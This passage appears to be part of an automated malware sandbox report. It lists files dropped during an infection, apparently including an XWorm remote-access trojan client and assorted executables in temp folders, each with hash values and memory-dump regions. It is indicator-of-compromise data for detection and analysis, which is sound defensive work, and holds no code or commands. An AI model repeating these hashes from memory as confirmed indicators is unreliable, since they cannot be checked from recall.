| SHA256 | 51638445d940ee396b2d963473fa473840459920f0201a765ccb8cf8869741d5 |
| SHA512 | 72322ef6c4ee7c278dccd755a487463e09e34551a2fd3f1fe7ba1bc216e275e7e17f36dbcf4f48b48875f416affc41bf9d2617fbd7fde759f265e7bdd55cc203 |
C:\Users\Admin\AppData\Local\Temp\WZSE0.TMP\TikTok18.bat
| MD5 | 5bdba5f40a247b93e7daa21c847f89fe |
| SHA1 | 95749fa521b8bbf78f55a3cd548776868bb231b7 |
| SHA256 | 16ae7d080a43e93f75b59b87b19248492422ce1a49fb6e275d483947a52076cb |
| SHA512 | 0cd57205312e1fdf1429d8c6dd1e424c83dde2e22d57cb28aa34e660d440733bfec4d6fe41a607772567d12b3baa1b0d7ef4f5287a59dbbd8a48f54b11037f75 |
C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe
| MD5 | 3d2c8474cf29654480a737b1af11edee |
| SHA1 | 763fb3cfdea60a2f4a37392727e66bdacc1b7c61 |
| SHA256 | b2c77896de8b7c5a3041017f03c47c10032162a85e4299ffa7ad7545be058da2 |
| SHA512 | 707d1aac77fb95beb0108a27bbe8fa5cff1ae6b81aa6899dfd91d03243540ee18df95731ce91231ae9a78c21dc5913d91238a2ff5f1391bf002edde6d322645b |
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
| MD5 | 892d97db961fa0d6481aa27c21e86a69 |
| SHA1 | 1f5b0f6c77f5f7815421444acf2bdd456da67403 |
| SHA256 | c4b11faff0239bc2d192ff6e90adec2684124336e37c617c4118e7e3bc338719 |
| SHA512 | 7fe31101f027f2352dea44b3ba4280e75a4359b6a822d813f9c50c0d6ef319b7c345280786c1bc794b45fbd4fa87939a79cc15b82fc7959ccce1b732f33ba241 |
memory/6120-5551-0x0000000004B50000-0x000000000517A000-memory.dmp
memory/6120-5549-0x0000000002170000-0x00000000021A6000-memory.dmp
memory/6120-5554-0x0000000005350000-0x00000000053B6000-memory.dmp
memory/6120-5555-0x00000000053C0000-0x0000000005426000-memory.dmp
memory/6120-5556-0x0000000005430000-0x0000000005787000-memory.dmp
memory/6120-5553-0x0000000005180000-0x00000000051A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtqg31oe.fzp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/6120-5573-0x0000000005900000-0x000000000591E000-memory.dmp
memory/6120-5574-0x0000000005AC0000-0x0000000005B0C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
| MD5 | 73507ed37d9fa2b2468f2a7077d6c682 |
| SHA1 | f4704970cedac462951aaf7cd11060885764fe21 |
| SHA256 | c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6 |
| SHA512 | 3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369 |
memory/6120-5592-0x0000000006FF0000-0x000000000766A000-memory.dmp
memory/6120-5593-0x0000000005F20000-0x0000000005F3A000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
| MD5 | ef48733031b712ca7027624fff3ab208 |
| SHA1 | da4f3812e6afc4b90d2185f4709dfbb6b47714fa |
| SHA256 | c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99 |
| SHA512 | ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029 |
memory/1372-5607-0x0000000000400000-0x00000000008B5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | b29bcf9cd0e55f93000b4bb265a9810b |
| SHA1 | e662b8c98bd5eced29495dbe2a8f1930e3f714b8 |
| SHA256 | f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4 |
| SHA512 | e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011 |
memory/5324-5609-0x00000148C43B0000-0x00000148C43D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HZLEQIVY\soft[1]
| MD5 | a8cf5621811f7fac55cfe8cb3fa6b9f6 |
| SHA1 | 121356839e8138a03141f5f5856936a85bd2a474 |
| SHA256 | 614a0362ab87cee48d0935b5bb957d539be1d94c6fdeb3fe42fac4fbe182c10c |
| SHA512 | 4479d951435f222ca7306774002f030972c9f1715d6aaf512fca9420dd79cb6d08240f80129f213851773290254be34f0ff63c7b1f4d554a7db5f84b69e84bdd |
C:\Users\Admin\Desktop\Cleaner.lnk
| MD5 | 58940972ccd09ceafab2287165a87036 |
| SHA1 | 5530896d1090090c96fb7c1a7cf815c5ef83d4bb |
| SHA256 | 909b2e2f7b227264a016c44022841e55fdc99b5eed01a19522be59600be19e1e |
| SHA512 | 546b5bbb71fd031923d32e3ee77d7fc483a0fb6e4bc4e60c1052984633b0b0baa6ccd8950d8825de022ded3c2bb426043b7f005365047848551bbbf12cad78cf |
memory/1304-5634-0x0000000000400000-0x00000000008BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
| MD5 | 3273f078f87cebc3b06e9202e3902b5c |
| SHA1 | 03b1971e04c8e67a32f38446bd8bfac41825f9cc |
| SHA256 | 4b6caa8467cf7ca3d7a3d3b2ac70e48510b7c4570e4810f3305aca1ef6cdf85c |
| SHA512 | 2a0bc7bf3ffd2f2e027e0feffb803f76dd11da48335e1b66a3c1927410e0a82c6ce212901c2ace9eca5bcce51eee49a12dc4619fc31711f0770e2d55ab7730f9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 68690b478692774e537fb381f1414691 |
| SHA1 | eadbe7d98f96a2d1e01b3daf0d45d84fa1d8f77b |
| SHA256 | 27897439a04c975c29f2e00a1418b10f8f268be6620e70e1e8c4b572ad0d44c8 |
| SHA512 | 6a564ddc7e104da46cb69be0090a4cceca617b46111ec3f6a6201c8d2ce49c68f6bbb6c7b7276dcff7c6a7c504886d6c04d3bb299f8b1e8a7f5fa67ecabcedc8 |
memory/5896-5673-0x00007FF714330000-0x00007FF714F80000-memory.dmp
memory/8932-5672-0x000001F7FE7A0000-0x000001F7FF688000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
| MD5 | ce69d13cb31832ebad71933900d35458 |
| SHA1 | e9cadfcd08d79a2624d4a5320187ae84cf6a0148 |
| SHA256 | 9effe406fd302590314a9211fda92126ea6a7721d294c93fdf755b4cdfbd0bcf |
| SHA512 | 7993e79a9aeee679c9342d36fcb7624f1e7616db59eff10ff50d00e84bbbc5d9d7c154601f8a94bed7f25888f43f6f1922b87af31a582221e9022e6a8c3b1409 |
memory/2136-5684-0x0000000000170000-0x000000000017E000-memory.dmp
memory/4508-5693-0x0000000000400000-0x000000000066D000-memory.dmp
memory/5464-5698-0x00007FFBF9D70000-0x00007FFBFA832000-memory.dmp